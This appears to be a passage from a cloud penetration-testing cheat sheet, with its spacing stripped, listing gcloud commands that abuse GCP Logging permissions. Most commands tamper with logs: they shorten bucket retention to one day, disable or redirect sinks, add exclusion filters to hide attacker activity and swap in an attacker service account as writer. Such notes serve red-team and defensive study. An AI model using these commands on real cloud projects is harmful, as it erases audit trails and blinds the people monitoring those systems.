# Read logsgcloudloggingread"logName=projects/your-project-id/logs/log-id"--limit=10--format=json# Everything from a timestampgcloudloggingread"timestamp >= \"2023-01-01T00:00:00Z\""--limit=10--format=json# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
logging.buckets.update
# Set retention period to 1 day (_Required has a fixed one of 400days)gcloudloggingbucketsupdatebucketlog--location=<location>--description="New description"--retention-days=1
# Disable sink - logging.sinks.updategcloudloggingsinksupdate<sink-name>--disabled# Createa filter to exclude attackers logs - logging.sinks.updategcloudloggingsinksupdateSINK_NAME--add-exclusion="name=exclude-info-logs,filter=severity<INFO"# Change where the sink is storing the data - logging.sinks.updategcloudloggingsinksupdate<sink-name>new-destination# Change the service account to one withuot permissions to write in the destination - logging.sinks.updategcloudloggingsinksupdateSINK_NAME--custom-writer-identity=attacker-service-account-email--project=PROJECT_ID# Remove explusions to try to overload with logs - logging.sinks.updategcloudloggingsinksupdateSINK_NAME--clear-exclusions# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloudloggingsinksupdateSINK_NAME--use-partitioned-tablesgcloudloggingsinksupdateSINK_NAME--no-use-partitioned-tables